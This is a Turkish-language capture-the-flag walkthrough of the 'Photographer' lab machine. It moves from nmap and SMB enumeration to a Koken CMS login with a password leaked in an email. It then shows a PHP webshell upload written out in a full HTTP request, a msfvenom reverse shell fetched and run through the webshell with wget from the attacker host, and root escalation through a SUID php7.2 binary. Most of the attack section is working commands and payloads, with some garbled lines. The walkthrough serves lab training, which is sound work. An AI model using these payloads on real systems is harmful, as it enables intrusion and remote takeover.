Enumeration

Nmap
Bir tarama çalıştırarak başlıyoruz :
kali@kali:~# sudo nmap $targetip  
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-19 21:56 EDT
Nmap scan report for $targetip
Host is up (0.29s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8000/tcp open  http-alt

Web Enumeration - Bağlantı Noktası 80
Photographer by v1n1v131r4 80 numaralı bağlantı noktasına giderken, bazı metinleri olan ve belirgin kullanıcı girdileri olmayan statik bir web sitesi görüyoruz .

Web Enumeration - Bağlantı Noktası 8000
8000 numaralı bağlantı noktasına giderken ikinci bir web sitesi buluyoruz. Bu, adı verilen bir içerik yönetim sistemi ile oluşturulmuştur Koken. Sayfa başlığında kullanılan sürümü bulabiliriz 0.22.24 versiyonu.
kali@kali:~# curl http://$targetip:8000 | grep generator
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  4708  100  4708    0     0   7667      0 --:--:-- --:--:-- --:--:--  7667
        <meta name="generator" content="Koken 0.22.24" />
EDB'de arama yaptığımızda, sürümümüzle tam olarak eşleşen bu istismarı "Koken" buluyoruz . Ancak, istismar kimlik doğrulama gerektirir, bu nedenle bunu daha sonra not edeceğiz ve diğer hizmetleri sıralamaya devam edeceğiz.

      ####Samba
İlk önce, kimlik doğrulaması yapmadan mevcut paylaşımları listeleyip listeleyemeyeceğimizi göreceğiz.
kali@kali:~# smbclient -L //$targetip
Enter WORKGROUP\kali's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        sambashare      Disk      Samba on Ubuntu
        IPC$            IPC       IPC Service (photographer server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
Bunlardan biri sambashare öne çıkıyor, bu yüzden gördüğümüz ilginç dosyaları bağlamaya ve yakalamaya çalışacağız.
kali@kali:~# smbclient //$targetip/sambashare
Enter WORKGROUP\kali's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jul 20 21:30:07 2020
  ..                                  D        0  Fri Aug 14 09:54:43 2020
  mailsent.txt                        N      503  Mon Jul 20 21:29:40 2020
  wordpress.bkp.zip                   N 13930308  Mon Jul 20 21:22:23 2020

                278627392 blocks of size 1024. 264268640 blocks available
smb: \> get mailsent.txt
getting file \mailsent.txt of size 503 as mailsent.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
Daha fazla araştırma, mailsent.txtbunun Agi Clarence'dan Daisa Ahomi'ye bir e-posta olduğunu ortaya çıkardı.
kali@kali:~# cat mailsent.txt 
Message-ID: <4129F3CA.2020509@dc.edu>
Date: Mon, 20 Jul 2020 11:40:36 -0400
From: Agi Clarence <agi@photographer.com>
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Daisa Ahomi <daisa@photographer.com>
Subject: To Do - Daisa Website's
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hi Daisa!
Your site is ready now.
Don't forget your secret, my $censoredpassword ;)
Bu son satır da göze çarpıyor, Don't forget your secret, my $censoredpassword ;). Potansiyel bir şifre gibi görünüyor.

      ####Exploitation

Köken CMS Kimlik Doğrulaması
8000 numaralı bağlantı noktasındaki web sitesine geri dönersek Koken, http://$targetip:8000/admin/ adresinde bulunan yönetici paneline erişmek için potansiyel e-posta ve şifre kombinasyonumuzu deneyebiliriz.
Kullanıcı adı: daisa@photographer.com Şifre:$censoredpassword
Bu, oturum açmamızı sağlar ve şimdi daha önce EDB girişinde özetlenen istismarı kullanabiliriz .

Koken CMS RCE
EDB girişindeki adımları takip ederek önce bir webshell payload'ı oluşturuyoruz image.php.jpg ve aşağıdaki içerikle olduğu gibi kaydediyoruz.
<?php system($_GET['cmd']);?>
Koken Import content tıklayın , image.php.jpg yükleyin ve burpsuite ile isteği durdurun. İstek sunucuya gönderilmeden önce hem name ve filename girdileri "image.php" olacak şekilde değiştirin. 
POST /api.php?/content HTTP/1.1
Host: $targetip:8000
...

-----------------------------9069320091048681796846484461
Content-Disposition: form-data; name="name"

image.php
-----------------------------9069320091048681796846484461
Content-Disposition: form-data; name="chunk"

0
-----------------------------9069320091048681796846484461
Content-Disposition: form-data; name="chunks"

1
-----------------------------9069320091048681796846484461
Content-Disposition: form-data; name="upload_session_start"

1597892262
-----------------------------9069320091048681796846484461
Content-Disposition: form-data; name="visibility"

public
-----------------------------9069320091048681796846484461
Content-Disposition: form-data; name="license"

all
-----------------------------9069320091048681796846484461
Content-Disposition: form-data; name="max_download"

none
-----------------------------9069320091048681796846484461
Content-Disposition: form-data; name="file"; filename="image.php"
Content-Type: image/jpeg

<?php system($_GET['cmd']);?>

-----------------------------9069320091048681796846484461--
Daha sonra web kabuğumuzun konumunu almak ve komutları yürütmeye başlamak için -> düğmesine Copy Link Location sağ tıklayabiliriz . 
Download File Örneğin, http://$targetip:8000/storage/originals/80/18/image.php?cmd=id adresine göz atmak, web sunucusunun hangi kullanıcı olarak çalıştığını görmemizi sağlar.
uid=33(www-data) gid=33(www-data) groups=33(www-data) 
Bir sonraki adımımız, bunu tamamen etkileşimli bir kabuğa dönüştürmek. Bunu yapmak için önce bir MSFVenom ters kabuk yükü oluşturacağız.
kali@kali:~# msfvenom -p linux/shell_reverse_tcp -f elf -o shell LHOST=kali LPORT=8000
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 68 bytes
Final size of elf file: 152 bytes
Saved as: shell
Daha sonra bu yükü basit bir HTTP sunucusuyla barındıracağız.
kali@kali:~# sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Ardından ters kabuğumuzu yakalamak için bir Netcat işleyicisi başlatırız.
kali@kali:~# nc -lvp 8000 
listening on [any] 8000 ...
Son olarak, http://$targetip:8000/storage/originals/80/18/shell.php?cmd=wget%20http://kali/shell%20 adresine göz atarak yükümüzü indirmek ve yürütmek için web kabuğumuzu kullanırız.
-O%20/tmp/shell%20%26%26%20chmod%20777%20/tmp/shell%20%26%26%20/tmp/shell. Çalıştırılmakta olan komut aşağıdaki gibidir.
wget http://kali/shell -O /tmp/shell && chmod 777 /tmp/shell && /tmp/shell
Ve ters kabuğumuzu yakalayın.
kali@kali:~# c -lvp 8000 
listening on [any] 8000 ...
$targetip: inverse host lookup failed: Unknown host
connect to [kali] from (UNKNOWN) [$targetip] 45106
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

      ####SUID İkili Dosyalarını Numaralandırma
Ayrıcalığımızı root'a yükseltmek için önce sistemdeki tüm SUID ikili dosyalarını numaralandıracağız.
find / -type f -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/sbin/pppd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/php7.2
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/chfn
/bin/ping
/bin/fusermount
/bin/mount
/bin/ping6
/bin/umount
/bin/su
İhtiyaçlarımıza mükemmel şekilde uyması gereken bir tanesi /usr/bin/php7.2. Bunu aşağıdaki gibi kullanabiliriz.
php7.2 -r "pcntl_exec('/bin/sh', ['-p']);" 
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
